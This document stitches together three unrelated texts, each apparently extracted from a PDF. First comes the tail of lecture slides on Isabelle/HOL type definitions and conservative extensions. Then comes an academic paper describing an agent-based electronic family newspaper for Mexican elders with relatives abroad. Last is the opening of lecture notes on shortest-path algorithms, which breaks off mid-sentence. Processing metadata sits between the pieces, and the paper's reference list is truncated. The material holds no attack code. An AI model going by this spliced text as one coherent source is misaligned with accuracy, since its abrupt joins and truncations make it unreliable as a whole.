\text{True} \) - \( \chi' = \chi \cup \{ \text{natset} \} \) - \( \Sigma' = \Sigma \cup \{ \text{Abs}_{\text{natset}} :: (\text{nat} \Rightarrow \text{bool}) \Rightarrow \text{natset}, \text{Rep}_{\text{natset}} :: \text{natset} \Rightarrow (\text{nat} \Rightarrow \text{bool}) \} \) - \( A' = A \cup \{ \forall x. \text{Abs}_{\text{natset}} (\text{Rep}_{\text{natset}} x) = x, \forall y. S \Rightarrow \text{Rep}_{\text{natset}} (\text{Abs}_{\text{natset}} y) = y \} \) - One has to prove \( T \vdash \exists x. (\lambda f. \text{True}) x \) (using Isabelle/HOL) ### Remarks on the set type **Remarks** - Isabelle/HOL allows to define a parametric type \( \alpha \text{ set} \) where \( \alpha \) is a type variable. - Functions of type \( \alpha \Rightarrow \text{bool} \) are used to represent sets, i.e., sets are represented by their characteristic function. - In \((\text{Abs}_\alpha \text{ set } f)\), the abstraction function \(\text{Abs}_\alpha \text{ set} \) can thus be read as “interpret \( f \) as a set”. - Here, sets are just an example to demonstrate type definitions. Later we study them for their own sake. ### Approaching the types for pairs **Given some types \( \alpha \) and \( \beta \). How can we represent pairs, i.e., define the type \( \alpha \times \beta \)?** **Idea:** - Existing type: \( \alpha \Rightarrow \beta \Rightarrow \text{bool} \) - Represent pairs as functions of type \( \alpha \Rightarrow \beta \Rightarrow \text{bool} \) - Use function \( \lambda x :: \alpha. \lambda y :: \beta. x = a \land y = b \) to represent the pair \((a, b)\) - It is clear that there is exactly one function for each pair. - There are also functions of type \( \alpha \Rightarrow \beta \Rightarrow \text{bool} \) that do not represent a pair, i.e., we have to define a nontrivial \( S \). ### Type definitions in Isabelle/HOL **Syntax for type definitions** ``` typedef (typevars) T' = "{x. A(x)}" ``` **Relation with explained schema:** - The new type is \( T' \) - \( r \) is the type of \( x \) (inferred) - \( S \) is \( \lambda x. A x \) - Constants \( \text{Abs}_{T'} \) and \( \text{Rep}_{T'} \) are automatically generated. ### Conservative extensions: Summary - We have presented a method to **safely** build up larger theories: - Constant definitions - Type definitions - Subtle side conditions - New types must be isomorphic to a “subset” of an existing type. - Isabelle/HOL uses these conservative extensions to - build up the theory **Main** from the core definitions of HOL (cf. Tutorials and manuals for Isabelle2011-1) - provide more convenient specialized syntax for conservative extensions (datatype, primrec, function, ...) ### Conclusions of Chap. 3 - HOL generalizes semantics of FOL - **bool** serves as type of propositions - Syntax/semantics allows for higher-order functions - Logic is rather minimal: 8 rules, more-or-less obvious - Other “logical” syntax - Rich theories via conservative extensions ### Questions 9. What is a standard model? 10. Give and explain one of the axioms of HOL? 11. Can the constants True and False be defined in HOL? 12. What does it mean that HOL+infinity is incomplete wrt. standard models? 13. What is a conservative extension? 14. What is the advantage of conservative extensions over axiomatic definitions? 15. Which syntactic schemata for conservative extensions were treated in the lecture? 16. Give examples of constant definitions. 17. Explain the definitions of new types? 18. Does a data type definition in Isabelle/HOL lead to a new type?
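The typedef examples above rest on two representation tricks: a set is its characteristic function, and a pair (a, b) is the function λx y. x = a ∧ y = b. The Python fragment below mimics only those encoding ideas; it says nothing about Isabelle's actual typedef machinery, and `mk_pair`, `fst`, and the explicit candidate domain are illustrative assumptions.

```python
# Toy illustration of the representation ideas behind the typedef examples:
# sets as characteristic functions, and the pair (a, b) as the predicate
# lambda x, y: x == a and y == b  (the HOL term  %x y. x = a & y = b).

def member(x, s):
    return s(x)                     # a "set" here is just its characteristic function

evens = lambda n: n % 2 == 0        # the subset of naturals picked out by S
assert member(4, evens) and not member(7, evens)

def mk_pair(a, b):
    """Represent the pair (a, b) by its defining predicate."""
    return lambda x, y: x == a and y == b

def fst(p, candidates):
    """Recover the first component by search over an explicit candidate domain
    (in HOL this job is done by the definite-description operator THE)."""
    return next(x for x in candidates for y in candidates if p(x, y))

p = mk_pair(2, 5)
assert p(2, 5) and not p(5, 2)
assert fst(p, range(10)) == 2
```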
{"Source-Url": "https://softech.informatik.uni-kl.de/homepage/teaching/SVHOL14/Chap3_4auf1.pdf", "len_cl100k_base": 6275, "olmocr-version": "0.1.49", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 50957, "total-output-tokens": 7289, "length": "2e12", "weborganizer": {"__label__adult": 0.000560760498046875, "__label__art_design": 0.0008144378662109375, "__label__crime_law": 0.0006837844848632812, "__label__education_jobs": 0.005809783935546875, "__label__entertainment": 0.0002290010452270508, "__label__fashion_beauty": 0.0003292560577392578, "__label__finance_business": 0.0006666183471679688, "__label__food_dining": 0.0010004043579101562, "__label__games": 0.001537322998046875, "__label__hardware": 0.000934600830078125, "__label__health": 0.001399993896484375, "__label__history": 0.0007357597351074219, "__label__home_hobbies": 0.00037169456481933594, "__label__industrial": 0.0015611648559570312, "__label__literature": 0.0021648406982421875, "__label__politics": 0.0007677078247070312, "__label__religion": 0.0013628005981445312, "__label__science_tech": 0.444091796875, "__label__social_life": 0.0003457069396972656, "__label__software": 0.00696563720703125, "__label__software_dev": 0.525390625, "__label__sports_fitness": 0.0005316734313964844, "__label__transportation": 0.0013256072998046875, "__label__travel": 0.00028324127197265625}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 20862, 0.00722]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 20862, 0.70268]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 20862, 0.72196]], "google_gemma-3-12b-it_contains_pii": [[0, 253, false], [253, 2195, null], [2195, 3821, null], [3821, 5618, null], [5618, 8459, null], [8459, 11070, null], [11070, 12837, null], [12837, 13903, null], [13903, 15474, null], [15474, 15827, null], [15827, 17873, null], [17873, 19468, null], [19468, 20862, null]], "google_gemma-3-12b-it_is_public_document": [[0, 253, true], [253, 2195, null], [2195, 3821, null], [3821, 5618, null], [5618, 8459, null], [8459, 11070, null], [11070, 12837, null], [12837, 13903, null], [13903, 15474, null], [15474, 15827, null], [15827, 17873, null], [17873, 19468, null], [19468, 20862, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 20862, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 20862, null]], "pdf_page_numbers": [[0, 253, 1], [253, 2195, 2], [2195, 3821, 3], [3821, 5618, 4], [5618, 8459, 5], [8459, 11070, 6], [11070, 12837, 7], [12837, 13903, 8], [13903, 15474, 9], [15474, 15827, 10], [15827, 17873, 11], [17873, 19468, 12], [19468, 20862, 13]], 
"pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 20862, 0.0]]}
olmocr_science_pdfs
2024-11-25
2024-11-25
329d53e3ad57edf36bbf5319ab51976e0676509b
A Web-Based System to Facilitate Elders Communication with Their Families Living Abroad Pedro C. Santana1, Marcela D. Rodríguez2,1, Víctor M. González4, Luis A. Castro2, Ángel G. Andrade3,1, Jesús Favela2 1School of Engineering, UABC University, México 2Computer Science Depart., 3Elec. and Telecomm. Depart., CICESE Research Center, México 4Department of Informatics, University of California, Irvine, USA {psantana, marcerod, quiroa, aandrade, favela}@cicese.mx, vmgyg@ics.uci.edu Abstract The aging of the population is a phenomenon faced by most nations. Growing old is often accompanied of a loss of close companionship which has been shown may aggravate the cognitive impairment of elders. From a qualitative study, key issues emerged regarding unmet needs of elders communication that we propose to address with web-based technology. We decided to create an electronic family newspaper to incorporate elders to the current social networks created by their younger relatives who already communicate through Internet applications, such as IM and e-mail. The system uses web-based technology to make it accessible from any web browser for those users living abroad. To serve the needs of elders and make the input of information easier, several autonomous agents help the user to interact with the system that can be accessed by any electronic display with a touch screen, such as a Tablet PC. 1. Introduction The aging of the population is a phenomenon faced by many nations, such as Mexico, in which 7.5% of the population is 60 years or older. It is estimated that by 2030 this figure will be more than double, reaching 17.5% [1]. Among those elders, 10% of them live alone with no close family members around them. This condition is more likely to occur in some regions of Mexico as it is related to the ever increasing migration of one or more of their relatives to the USA. The living conditions of those elders can be quite complex as they often face the impossibility of visiting or being visited by their families as they lack proper documentation (VISAS or residency permits). And even when this is not a problem, distance and cost might reduce direct contact to one visit every other year. As it has been found, lack of contact with family members and friends may have a negative impact on elder’s health, such as accelerating a cognitive decline [2, 3]. Thus, Mexican elders in this situation face particular challenges that might aggravate some of the well-known effects of living with no close companionship. Technically, the system focuses on solving two important challenges. On the one hand, the system aims to provide adequate interfaces for each of the different types of users that would use it. Elders must have an interface that is adequate for their needs. Family members must have means to use their current tools (e.g. email clients) without the need to migrate to another communication tool. On the other hand, the system enhances the interactions with family members. Based on a set of autonomous agents the system provides an enhanced level of interaction beyond synchronous and asynchronous forms. Our work aims to provide a technological solution focused on supporting the relationship between elder people living alone in Mexico and their relatives living abroad. 
The central concept of the proposed system is an electronic family newspaper, through which elders and their families: a) share important information, b) personal reminiscences and cultural stories c) may interact with virtual relatives; and c) occasionally may interact with the real relatives. It is thought that the electronic family newspaper will enable elders to feel more engaged and connected with their relatives living abroad as it provides richer forms of communication, and, it will facilitate their integration into the networks that currently connect members of their families who increasingly are making use of e-mail systems to keep in touch with each other and help to incorporate elders to the current social networks created by their younger relatives who already communicate through Internet applications, such as IM and e-mail. 2. Problem context: the need to be connected An initial understanding of the phenomenon of migration and the need to be connected was obtained by the analysis of the records of the websites of Alhuey (see Figure 1), San Luis de la Paz and Cihuatlán, all small towns in different parts of Mexico with a important number of people living abroad or in other big cities in Mexico. Members of these communities maintain contact with their roots through these Internet applications which enables them to share photos, stories and anecdotes. We analyzed the contents of those web sites as a departure point to understand some of the aspects involved in migrating and keeping ties to communities. A central feature of these web sites is that they let people of different ages share personal information in the form of digital photos. For instance, in Alhuey’s web site visitors can upload pictures and post comments to share with others. We found that in this site an average of 2 pictures and 6 posts are placed every single day by around 1050 users. Based on the comments posted on the web sites, we found that some of them have been absent from their native land for years. Most of them are interested in what is happening in their towns and some of them want to know what happened to their old friends. For instance, they are concerned about issues such as people getting married, people who passed away, whether some of their friends have children or not, but most of them just want to know where everybody is living. Consequently, the web site plays a major role on keeping people in touch with their social networks from their beloved town. We also noticed that several users are using these websites as communication tools to complement other tools such as e-mail or instant messaging. The sense of community facilitated by the technology, perhaps particular for small towns where everyone knows each other, provided good initial insight of what it is required by people in order to be connected in spite of distance. These results guide our initial understandings that serve to focus our inquiry over the particular situation of elders living alone. 3. Understanding elderly people Our research was then oriented towards understanding the emotional needs of Mexican elders with families living abroad. We wished to gain knowledge about the experiences of elders in regards to the following five main aspects: communication with relatives, feelings of isolation, health care, keeping up to date with things around them such as family events, and being independent. From these lines of inquiry we aimed to reveal fundamental requirements for a system supporting elders. ![Figure 1. 
Alhuey web site Photographs in Album.](image) 3.1. Methods Based on personal contacts and recommendations from them, we contacted a number of elders that were experiencing the scenario that we were aiming to understand. Our set of informants included people of different genders, age and living in different geographical regions of Mexico. Our interviews were semi structured and were conducted within the home environment (e.g. the kitchen) following standards and recommendations for qualitative interviews [4]. 3.2. Results The interviews were analyzed using a comparative verification of evidence which resulted in the identification of major themes for each topic of inquiry. In this section we explained some of the most relevant results. We found that the main mode of communication with relatives living abroad was the telephone which basically is used to update each other about news and recent family events. Phone calls are not always frequent and are more likely to occur at special occasions such as birthdays or holidays or when some emergency issues arise (e.g. accidents or other major problems). All our informants expressed their preference for being in constant communication with their families, but recognized that this is not always possible. One of our interviewees expressed that the impossibility of communicating on a more regular basis can bring some sadness to her. Those facts point to the relevance of providing appropriate mechanisms. to help elders feel connected to their families. We noticed that a central component that is missed whenever families get separated is the ability to share day-to-day experiences. Many times the content of communications is limited to basic information regarding the well-being of the persons, health, financial situation, or relevant events. However elders and their families have little chance to share the little things that sometimes make life enjoyable and they used to share when they were together: local events, conversations, the ability to see each other and other emotionally important facts. Our results also highlighted the importance given by elderly people to photo albums. It is a real treasure to them. An old couple commented, “Our grandchildren love to look at the album and asks us what her mother used to do when she was a kid”. Moreover, they intend to acquire a video camera to record all the visits of their relatives. This showed us that pictures are artifacts from which we could take advantage of, due to the stories and emotive load associated to them. Finally, it was interesting to find that those elders interviewed show disposition to engage in learning new things. As a way to keep them active, some of them are taking courses (e.g. English lessons). Similarly, another person is going to elementary school and is very proud of her achievements and motivated to continue her studies for as long as she can. This disposition to learn can be very relevant for the purposes of introducing any technological solution. Based on these findings and our preliminary understanding of the phenomenon, we engaged in designing a system to support the emotional ties among Mexican elders and their families living abroad, focusing on a way to enhance their communication. 4. Related work In this section we compare some alternative approaches that have been discussed within the context of providing companionship for elders. 
Some design concepts and products have intended to create emotional connections over a distance by applying theories of affective computing combined with ubiquitous computing technology. For instance, the Gust of Presence system provides a suitable carrier for affective communication by enabling a two-way notification of presence [5]. This system lets parents and children who live apart inform each other when they have arrived home. It uses a bowl, which senses when the user throws something into it, such as money or keys, which may indicate he has arrived at his home. Then, the bowl takes a picture from the inside and sends this information to another identical bowl located in the parent’s home. Similarly, the Lovelet [6] is a wearable communication tool for intimate people for naturally and timely conveying affection. This consists of a thermo sensor that always senses air temperature surrounding a user, the temperature data is transmitted to another user and depending on the temperature, a full color LED (Light Emitting Diode) illuminates in different color to indicate an emotional state. Although, both the Gust of Presence and the Lovelet can help to share emotional states, they are not appropriate to support communication in a more direct way and do not address directly the needs of elders. The SeniorNet [7] tool is a computer-mediated communication (CMC) tool exclusively for older adults and was used to identify a number of motivations that older adults expressed for using CMC technology. Many SeniorNet users mentioned that SeniorNet was an important way to meet people with similar interest, access information, and develop companionship and supportive relationships. Although SeniorNet seems to be in the right track attending the needs of elders, it fails to be oriented towards supporting the communication with people outside the network that include family members using other tools such as e-mail. In contrast with those systems, we aimed to create a system that provides a more comprehensive support for elders and their families. Based on our interviews we decided to focus the design of our systems to ameliorate the isolation of elders by means of digital photos and narrations accessible through a repository of information in the form of an electronic newspaper. We decided to use the metaphor of a newspaper as it is a well understood concept by both elders and young people and conveys the idea that information is provided in a frequent basis. We envisioned that through the newspaper, the elders and their family would share their emotions, anecdotes, memories, and other kind of information, such as Mexican traditions. 5. Envisioned system We envision that to ameliorate the loneliness of Mexican elders, our system needs to address the following aspects: Enable elders and their family to feel close and maintain contact in an entertaining way. We envisioned an electronic family newspaper, which enables users to share information, such as personal memories, anecdotes, or traditions that elders would like to transmit to their younger relatives, or vice versa, the family residing in USA sharing the American customs they have adopted. The information transmitted through the family newspaper, is categorized in different sections. For instance, in the Social section the family may publish photos or a video of when the granddaughter graduated from high school. The Entertainment section provides activities for elders, such as a memory game, in which the elder may play with a virtual relative. 
Enable an easy way for elders to use the system. We consider that for elders we need to propose an easy way to use the system based on a computer with a touch screen. The system enables elders to contribute to build the newspaper by using digital cameras, and scanners to get images of documents or printed photos they want to publish in the newspaper. Make the system accessible for the elders’ family. As most of the elders’ families already use Internet communication tools to be in contact with their relatives and friends, we should take advantage of this. Thus, with the aim of providing an easy to use system, it integrates web technology already known by the users living abroad. Elders may access and use the system in several places within the home. The family newspaper is presented in a display that can be hung on any wall of any room of the home of an elder, in which a senior spends most of his time or usually reads the conventional newspaper. To clarify how these features are addressed by our system, we constructed several scenarios of use to illustrate the system’s functionality. The creation of scenarios enabled us to generate and communicate design ideas for our system and to better understand the implications of particular design solutions [8]. Next, we present some of the use scenarios in which we envision how elders may ameliorate their loneliness through the electronic family newspaper. 5.1. Scenario 1 Mrs. and Mr. Valenzuela are old adults living alone in Guadalajara, Mexico with two daughters and a son living in Santa Ana, California, USA. While Mrs. Valenzuela is preparing breakfast, the display in the kitchen plays an alarm to notify her that there is some family news that may be interesting for her. She approaches the display and notices that there are new messages in the Cooking section. As the “5 de Mayo” Mexican holiday is coming, her daughters are organizing a dinner at the neighborhood and have published a list of potential Mexican dishes (see Figure 2) they would like to prepare for the occasion. Mrs. Valenzuela realizes that she has the recipes of some of them and decides to go for her cooking book to send them to her daughters. While Mrs. Valenzuela goes for the book, Mr. Valenzuela quickly pulls the display and reads the family newspaper while he is eating breakfast. He selects the Sports section because he is sure his son Mario has written a review of the latest soccer game of the Mexican league. As Mr. Valenzuela realizes that his son would like to read interviews of some of the players that were published in yesterday’s local newspaper, he scans the note and attaches it to the review. At that moment Mrs. Valenzuela is back with a bunch of old cooking books and asks her husband: “Do you think that they will find Tejocotes for the tea in Santa Ana?.” 5.2. Scenario 2 Mrs. Diana is a 72 years old woman who lives alone in Tijuana, Mexico. She likes to play with the memory game included in the Entertainment section of her family newspaper. When she selects the memory game to start to play, a set of images of her family residing in the USA and other places of Mexico is presented at the top of the screen. As she misses her grandson Jose, she decides to play this session with him. For this, she selects the photograph of Jose and the virtual Jose appears saying hello and the memory game, which includes only images of the latest events related to her grandson. When Diana matches a first pair of cards, the virtual Jose, explains a little bit of the event in the picture. 
While Mrs. Diana and the virtual Jose are playing, her grandson is doing his homework on his computer. He realizes that his grandmother is playing and decides to join the game. The grandmother is glad of playing with her grandson. 6. System design In order to achieve the system functionality we are proposing an agent-based system which architecture is described next. 6.1. Dual interfaces The system was designed to provide an interface for elders and another interface for family members. To serve the needs of elders and make the input of information easier, the system is based on Tablet PC technology. By using a pen to touch the screen, elders can access the functionality and input information. In addition, Family members can use the system through any other device with a web browser. We believe that this would help the seamless adoption of the system. 6.2. System Architecture As illustrated in Figure 3, the architecture of the electronic family newspaper consists of several layers. Codice CMS. The system includes a Weblog Content Management System named Codice in which a weblog is created by the family members to load the information they want to publish in the family newspaper through the Codice Web Services APIs. A weblog is a term used to refer to a webpage that has frequent postings made to it by the person who created the page and others who are given rights to access the page. The trend of using weblogs is gaining momentum with the introduction of automated publishing tools that facilitate the publishing process and improve the user experience and usability; Codice was built on AJAX (Asynchronous JavaScript + XML). Ajax incorporates standards-based presentation (XHTML and CSS), dynamic display and interaction (Document Object Model), data interchange and manipulation (XML and XSLT), asynchronous data retrieval (XMLHttpRequest) and JavaScript binding everything together [9]. The Ajax engine, allows the user’s interaction with Codice to happen asynchronously. ![Figure 3. The Family Newspaper architecture.](image) Codice Web services API. To implement our system we are using the Service-Oriented Computing (SOC) paradigm that utilizes services as fundamental elements for developing applications [10]. A service is an application that exposes its functionality through an application programming interface (API). A Web resource is any type of named information object that is accessible through the Web. Therefore a Web service possesses the characteristics of both a Web resource and a service. It is an application that exposes its functionality through an API, and it is a Web resource that is designed to be consumed by software rather than by a human sitting at a browser [11]. Because services provide an uniform and ubiquitous information distributor for a wide range of computing devices (such a Tablet PCs, PDAs, cellular telephones, or appliances) and software platforms (e.g., LINUX or Windows), we based our architecture on a Web service API layer in order to interact with Codice CMS programmatically. **Elder’s Client.** This layer is the subsystem that enables elders to create and interact with the electronic family newspaper. The main components of this layer were identified as agents since they have attributes that enabled us to cope with the desirable system feature of facilitating the elder interaction with the system. The metaphor used is that of a personal assistant [12] who seamlessly collaborates with the elder in the same work environment. 
In this case, autonomous agents proactively help elders to perform difficult tasks, such as using the scanner to publish information on the newspaper, represent the relatives when they are not connected to the system, and to communicate with their relatives. We proposed that autonomous agents not only represent the users living abroad, but may act as proxies to the system’s devices (such as Tablet PC, digital cameras or scanners). Through a Tablet PC, elders can navigate the electronic newspaper and introduce some commands by touching the screen. The system also displays a keyboard so that seniors can easily introduce some text, such as to provide a brief description of a picture. Thus, at the elder’s home the Tablet PC can be located in any place where they would like to read the family newspaper. The Tablet PC acts as a server for the system’s agents that enable elders to visualize the family newspaper or update it. **Relative’s Client.** Like the elder’s client, the main components of this layer were identified as agents, since they have attributes that enabled us to cope with the desirable system feature of facilitating the interaction with the system. The electronic family newspaper can be accessed by the elder’s relative from any computer with a web browser. **Family Newspaper Agents.** This layer allows the agents to turn the web services into proactive entities working as peers to serve the elders or their relatives, representing it in the system, composing dynamically the family newspaper. The next section describes the functionality provided by these agents. 6.3. System Agents Envisioning our technological solution as a multi-agent systems enabled us to implement a scalable and loosely-coupled system in which by means of autonomous agents we can add new functionality to the system (i.e. new games), integrate new devices (i.e. video cameras) and other people with whom the user may want to be connected, such as close family friends. The main system's agents (see figure 4) are described next: The Newspaper Agent: This agent is aware of new entries in the Codice weblog to build or update the newspaper. To monitor and collect the weblog changes, the newspaper agent was built as content a syndication reader powered by the RSS (RDF Site Summary – formerly called Rich Site Summary) standard which is an application of the eXtensible Markup Language (XML) that adheres to the World Wide Web Consortium’s Resource Description Framework (RDF) and is a method of describing news or other Web content that is available for syndication or distribution from an online publisher [13], in this case it is accessible through the Codice APIs, which generate XML when a change occurs in the family newspaper. Weblog agent: It acts as a proxy to the Codice’s APIs by enabling users to post information into the Weblog. This agent receives information directly from the elder’s relatives or from the agents that help elders to contribute to the family newspaper (see figure 5), such as the Scanner Agent. Display agent: It is a proxy to the display. It has control of what and when the information is presented in the Tablet PC. For instance, when the display agent is notified that a new entry in the newspaper is available, it automatically opens the family newspaper application. Scanner Agent: The images and text provided by the elder can be loaded through a scanner. For this, the system provides an agent acting as a proxy to these devices. 
When the elder scans a document or picture, the Scanner Agent sends the image to the weblog Agent in order to be posted on the weblog and then added to the family newspaper. Memory Game Agent: When the elder joins the Entertainment section, he or she is presented with several activities, such as the Memory Game. The Memory Game Agent is a server application that monitors the movements of the players, and validates them. It also maintains a database with images and a brief story describing them. If the elder chooses to play, this agent will generate a set of cards with the images posted in the weblog, as illustrated in Figure 6. **Virtual Player Agent:** This is a companionship agent. If the elder chooses to play the memory game with one of his relatives, the memory game agent will generate a set of cards containing images related with that particular person. Both, the elder and the virtual player agent will make alternate movements. When a pair of cards is matched, the Virtual Player Agent will display a brief story related to that card’s image as illustrated in Figure 7. This agent is visually represented by a relative’s photograph. When this agent perceives that the person being represented is connected, it invites him to joining to the game. Thus, the relative realizes the elder is thinking about him. If the relative decides to join the game, the virtual player agent will cede control to him, and the photograph of the relative will be emphasized to indicate the real relative is playing the game. **Real Player Agent:** If a relative decides to join a game of memory with the elder, the Real Player Agent is started. Then, it is connected to the game server, which is the Memory Game Agent. The Real Player Agent has an IM client through which the user can maintain contact with the elder while they are playing. Through a sample application, we describe next how these components interact to support emotional and social ties of elders and their family. ### 6.4. Sample application We revisit Scenario 1 to illustrate the functionality of the system architecture. Figure 8 illustrates how the system’s components interact to support this scenario: While Mario is at his school, he loads in the weblog a review he wrote for his father of the latest soccer game of the Mexican league. The Newspaper Agent is aware that a change was made to the weblog, and updates the family newspaper. Then, it notifies the family Display Agent that the newspaper is available. The Display agent sounds an alarm to advertise that the newspaper has news. Thus, while Mr. Valenzuela is eating his breakfast, he approaches the display and selects the Sports section. As Mr. Valenzuela realizes that his son would like to read some comments from some of the players published in yesterday’s newspaper, he scans the note. For this, he touches some buttons on the system to address the scanner system. Then, Mr. Valenzuela chooses to load the note. The order is interpreted by the Weblog Agent that posts the note. Finally, the Newspaper Agent becomes aware of the new change in the weblog, and then, modifies the newspaper. ![Figure 6. The Memory Game - Entertainment Section.](image) **Figure 6.** The Memory Game - Entertainment Section. ![Figure 7. The Virtual Player - Entertainment Section.](image) **Figure 7.** The Virtual Player - Entertainment Section. ### 7. 
Conclusion and future work We have presented the design of a system to help elders to incorporate them to the social networks that have become fragmented due to the distance between them and their families living abroad. We centered our design in three main aspects: 1) Provide an easy to use interface for elders. For this, the presentation of the shared information is presented in the format of a newspaper, which is a concept already known by any user. For facilitating the elders’ interaction with the family newspaper, we propose they access it through a Tablet-PC with a touch screen, in which there are several autonomous agents as personal assistants. 2) Make the system accessible for the elders’ relatives from any computer. The system uses web-based technology, such as weblogs which is a tool already used by many people to share personal information with others. 3) Designing our system in such a way facilitates its extension and evolution. For this, we used autonomous agents as the main design constructors of the system. In regards to this aspect, we are planning to extend the system’s functionality to provide “reminders” to users. For instance, we found from our study that elders’ family make phone calls more frequently at the beginning of their separation. However as times goes by, elders and their families might experience more infrequent interactions, their relationships get disrupted and this causes sadness to both parties. To remedy this, agents can be aware of this situation and decide when to send a “reminder” to one or more of the relatives so that the emotional ties remain among them. 8. References 1. CONAPO, There are in Mexico 7.9 millions of elders. 2004. 13. Çelikbas, Z., What is RSS and how can it serve libraries?, in Info To Go Navigating the Internet. 2004.
{"Source-Url": "http://www.researchgate.net/profile/Luis_Castro7/publication/221036010_A_Web-Based_System_to_Facilitate_Elders_Communication_with_Their_Families_Living_Abroad/links/09e41512e326b30090000000.pdf", "len_cl100k_base": 5895, "olmocr-version": "0.1.50", "pdf-total-pages": 8, "total-fallback-pages": 0, "total-input-tokens": 23250, "total-output-tokens": 6794, "length": "2e12", "weborganizer": {"__label__adult": 0.0013790130615234375, "__label__art_design": 0.00665283203125, "__label__crime_law": 0.0013017654418945312, "__label__education_jobs": 0.0243988037109375, "__label__entertainment": 0.00044345855712890625, "__label__fashion_beauty": 0.0007405281066894531, "__label__finance_business": 0.0011072158813476562, "__label__food_dining": 0.0017604827880859375, "__label__games": 0.0021533966064453125, "__label__hardware": 0.0063018798828125, "__label__health": 0.0123748779296875, "__label__history": 0.00171661376953125, "__label__home_hobbies": 0.001941680908203125, "__label__industrial": 0.0008015632629394531, "__label__literature": 0.0018720626831054688, "__label__politics": 0.0006742477416992188, "__label__religion": 0.002330780029296875, "__label__science_tech": 0.309814453125, "__label__social_life": 0.0175628662109375, "__label__software": 0.1480712890625, "__label__software_dev": 0.4541015625, "__label__sports_fitness": 0.0005459785461425781, "__label__transportation": 0.0012798309326171875, "__label__travel": 0.0007929801940917969}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 31195, 0.01689]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 31195, 0.37705]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 31195, 0.9562]], "google_gemma-3-12b-it_contains_pii": [[0, 4068, false], [4068, 8316, null], [8316, 13478, null], [13478, 17928, null], [17928, 22500, null], [22500, 24860, null], [24860, 28785, null], [28785, 31195, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4068, true], [4068, 8316, null], [8316, 13478, null], [13478, 17928, null], [17928, 22500, null], [22500, 24860, null], [24860, 28785, null], [28785, 31195, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 31195, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 31195, null]], "pdf_page_numbers": [[0, 4068, 1], [4068, 8316, 2], [8316, 13478, 3], [13478, 17928, 4], [17928, 22500, 5], [22500, 24860, 6], [24860, 28785, 7], [28785, 31195, 8]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 31195, 0.0]]}
olmocr_science_pdfs
2024-11-29
2024-11-29
ff597fe533c313592734d7afbdc5ee017489e3cc
In this lecture we continue our discussion of dynamic programming, focusing on using it for a variety of path-finding problems in graphs. Topics in this lecture include: - The Bellman-Ford algorithm for single-source (or single-sink) shortest paths. - Matrix-product algorithms for all-pairs shortest paths. - Algorithms for all-pairs shortest paths, including Floyd-Warshall and Johnson. - Dynamic programming for the Travelling Salesperson Problem (TSP). 1 Introduction As a reminder of basic terminology: a graph is a set of nodes or vertices, with edges between some of the nodes. We will use $V$ to denote the set of vertices and $E$ to denote the set of edges. If there is an edge between two vertices, we call them neighbors. The degree of a vertex is the number of neighbors it has. Unless otherwise specified, we will not allow self-loops or multi-edges (multiple edges between the same pair of nodes). As is standard with discussing graphs, we will use $n = |V|$, and $m = |E|$, and we will let $V = \{1, \ldots, n\}$. The above describes an undirected graph. In a directed graph, each edge now has a direction (and as we said earlier, we will sometimes call the edges in a directed graph arcs). For each node, we can now talk about out-neighbors (and out-degree) and in-neighbors (and in-degree). In a directed graph you may have both an edge from $u$ to $v$ and an edge from $v$ to $u$. We will be especially interested here in weighted graphs where edges have weights (which we will also call costs or lengths). For an edge $(u, v)$ in our graph, let’s use $\text{len}(u, v)$ to denote its weight. The basic shortest-path problem is as follows: **Definition 1** Given a weighted, directed graph $G$, a start node $s$ and a destination node $t$, the s-t shortest path problem is to output the shortest path from $s$ to $t$. The single-source shortest path problem is to find shortest paths from $s$ to every node in $G$. The (algorithmically equivalent) single-sink shortest path problem is to find shortest paths from every node in $G$ to $t$. We will allow for negative-weight edges (we’ll later see some problems where this comes up when using shortest-path algorithms as a subroutine) but will assume no negative-weight cycles (else the shortest path can wrap around such a cycle 